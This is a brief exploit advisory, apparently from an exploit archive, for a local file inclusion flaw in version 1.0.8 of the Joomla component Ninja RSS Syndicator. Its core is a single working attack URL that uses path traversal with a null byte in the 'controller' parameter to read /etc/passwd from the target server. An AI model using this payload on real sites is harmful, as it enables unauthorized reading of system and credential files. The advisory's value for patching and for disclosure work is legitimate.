id: 11329
date: 03/15/2010
title: Ninja RSS Syndicator v1.0.8 Local File Include Vulnerability
author: jdc
cves: 

============================================================
Ninja RSS Syndicator v1.0.8 Local File Include Vulnerability
============================================================

Joomla component Ninja RSS Syndicator 1.0.8 Local File Include
Version     : 1.0.8
Author      : jdc
Download :
http://ninjaforge.com/index.php?option=com_ninjacentral&page=show_package&id=74&Itemid=236
 
http://site/index.php?option=com_ninjarsssyndicator&controller=../../../../../etc/passwd%00



#  0day.today [2023-03-26]  #